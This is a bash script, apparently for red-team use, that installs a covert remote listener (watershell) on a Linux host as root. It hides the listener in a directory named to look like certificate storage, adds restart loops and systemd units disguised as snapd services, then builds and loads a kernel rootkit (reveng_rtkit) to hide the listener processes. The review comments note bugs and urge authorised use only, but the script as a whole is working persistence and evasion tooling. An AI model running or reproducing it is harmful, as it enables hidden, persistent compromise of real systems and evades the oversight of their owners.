#!/bin/bash
# cerberus_setup-v2.sh — red-team persistence installer (fork of RITRedteam/watershell-cpp).
#
# Steps, in order: install build deps; clone and build the Cerberus-shell
# (watershell) listener; stage it under /usr/local/share/ssl-certificates; install
# two systemd units whose names mimic snapd units (one runs the listener in a
# restart loop, one is a Python watchdog for it); then clone, build and load the
# reveng_rtkit kernel module and use it to hide the listener processes (signal 31).
#
# Review notes / operational caveats:
#   * Only run on hosts you are explicitly authorized to modify: this loads an
#     out-of-tree kernel module and installs root-level persistence with no
#     uninstall path.
#   * Every privileged step is a separate `sudo` call; a password prompt in the
#     middle of a `cat | sudo tee` pipeline will stall the run.
#   * There is no `set -e`/`pipefail`; most failures below are not fatal and are
#     called out step by step.
#   * The interface ("eth0") and port (10000) are hard-coded in three places
#     (startup script, watchdog, pgrep pattern) and must be kept in sync.
#
# Install build toolchain, python3 and the headers matching the running kernel
# (the headers are what `make` in kernel_src below builds the module against).
sudo apt-get install -y g++ python3 build-essential linux-headers-$(uname -r)
# Clone the Cerberus-shell (watershell) repository into the current directory
git clone https://github.com/Dack985/Cerberus-shell.git
# NOTE(review): neither the clone nor this cd is checked. If the clone fails and
# the directory does not exist, cd fails, the script keeps running in the caller's
# cwd, and the `cp -R *` below copies whatever is there into /usr/local/share.
cd Cerberus-shell
# Compile the listener (result unchecked; the -x test below is the only guard)
g++ main.cpp watershell.cpp -o watershell
# Verify the binary exists and is executable. NOTE(review): a stale ./watershell
# left by an earlier run also passes this test even if g++ just failed.
if [ -x "./watershell" ]; then
echo "Watershell binary compiled successfully."
# Staging directory; the name is chosen to blend in under /usr/local/share
sudo mkdir -p /usr/local/share/ssl-certificates
# Copy the whole checkout, sources included (the unquoted `*` does not match
# dotfiles, so .git is not copied)
sudo cp -R * /usr/local/share/ssl-certificates
# Everything under the staging directory becomes root-owned
sudo chown -R root:root /usr/local/share/ssl-certificates
# Startup script: re-launches the listener one second after it exits, forever.
# The heredoc is unquoted but contains no `$` or backticks, so the hard-coded
# port/interface are written literally.
cat <<EOF | sudo tee '/usr/local/share/ssl-certificates/cerberus_shell.sh' > /dev/null
#!/bin/bash
cd /usr/local/share/ssl-certificates
while true; do
./watershell -l 10000 eth0
sleep 1
done
EOF
# Make the startup script executable
sudo chmod +x '/usr/local/share/ssl-certificates/cerberus_shell.sh'
# systemd unit for the startup script. The unit name mimics a snapd unit, but
# Description= still reads "Cerberus Shell Startup" in `systemctl status` output.
# No Restart= here: the in-script loop does the restarting.
cat <<EOF | sudo tee '/etc/systemd/system/snap-snapd-21445.service' > /dev/null
[Unit]
Description=Cerberus Shell Startup
[Service]
ExecStart=/usr/local/share/ssl-certificates/cerberus_shell.sh
User=root
Group=root
[Install]
WantedBy=multi-user.target
EOF
# Python watchdog: once a second, pgrep for the listener and re-exec it if absent.
# NOTE(review): subprocess.run waits for its child, so after a restart the loop
# blocks until that watershell exits; pgrep's stdout is not captured, so the
# matched PID is printed to the journal every second; and it duplicates the
# restart loop in cerberus_shell.sh, so both supervisors could launch a listener.
# (Heredoc is unquoted; the script contains no `$`, so nothing is expanded.)
cat <<EOF | sudo tee '/usr/local/bin/cerberus_monitor.py' > /dev/null
#!/usr/bin/env python3
import subprocess
import time
def check_cerberus_process():
while True:
try:
subprocess.run(["pgrep", "-f", "watershell -l 10000 eth0"], check=True)
except subprocess.CalledProcessError:
print("Cerberus Shell process not found. Restarting...")
subprocess.run(["/usr/local/share/ssl-certificates/watershell", "-l", "10000", "eth0"])
time.sleep(1)
if __name__ == "__main__":
check_cerberus_process()
EOF
# Make the watchdog executable
sudo chmod +x '/usr/local/bin/cerberus_monitor.py'
# systemd unit for the watchdog; Restart=always brings the watchdog itself back
# if it dies (again named to look like a snapd unit).
cat <<EOF | sudo tee '/etc/systemd/system/snap-snapd-21446.service' > /dev/null
[Unit]
Description=Monitor Cerberus Shell Process
[Service]
ExecStart=/usr/local/bin/cerberus_monitor.py
Restart=always
User=root
Group=root
[Install]
WantedBy=multi-user.target
EOF
# Reload systemd to pick up the new unit files
sudo systemctl daemon-reload
# Enable (persist across reboot) and start both units now
sudo systemctl enable snap-snapd-21445.service
sudo systemctl start snap-snapd-21445.service
sudo systemctl enable snap-snapd-21446.service
sudo systemctl start snap-snapd-21446.service
# Clone the reveng_rtkit rootkit repository. cwd is still ./Cerberus-shell, so
# the rootkit tree lands inside that checkout.
git clone https://github.com/reveng007/reveng_rtkit.git
# Build the kernel module and load it. NOTE(review): `make` is unchecked; if it
# fails, insmod fails and the script exits with the persistence units already
# installed and running (there is no rollback).
cd reveng_rtkit/kernel_src
make
if sudo insmod reveng_rtkit.ko; then
echo "Rootkit module loaded successfully."
else
echo "ERROR: Could not load reveng_rtkit.ko. Exiting."
exit 1
fi
# Sanity check: the loaded module is expected to expose this char device, which
# the usermode client below talks to
if [ ! -e /dev/reveng_rtkit ]; then
echo "ERROR: Character device /dev/reveng_rtkit does not exist."
exit 1
fi
# Build the usermode client for the module (gcc result unchecked)
cd ../user_src
gcc client_usermode.c -o client_usermode
# Switch the rootkit to protected mode; the heredoc feeds the "protect" command
# on stdin in place of interactive input
sudo ./client_usermode <<EOF
protect
EOF
# Hide the listener and its restart loop: per the original comments, the rootkit
# treats signal 31 as "hide this process". The watchdog (cerberus_monitor.py)
# and the two systemd units are not hidden by this step.
for pid in $(pgrep -f "watershell -l 10000 eth0"); do
sudo kill -31 "$pid" # hide process using the rootkit
done
for pid in $(pgrep -f "cerberus_shell.sh"); do
sudo kill -31 "$pid" # hide process using the rootkit
done
# Clean up. NOTE(review): a bare `cd` goes to $HOME, not back to where the script
# was started, so `rm -rf Cerberus-shell` only removes the checkout (and the
# rootkit source inside it) when the script was launched from $HOME.
cd
rm -rf Cerberus-shell
echo "Cerberus and rootkit setup completed successfully."
else
# Reached when ./watershell is missing or not executable after the g++ step
echo "ERROR: Watershell binary compilation failed."
exit 1
fi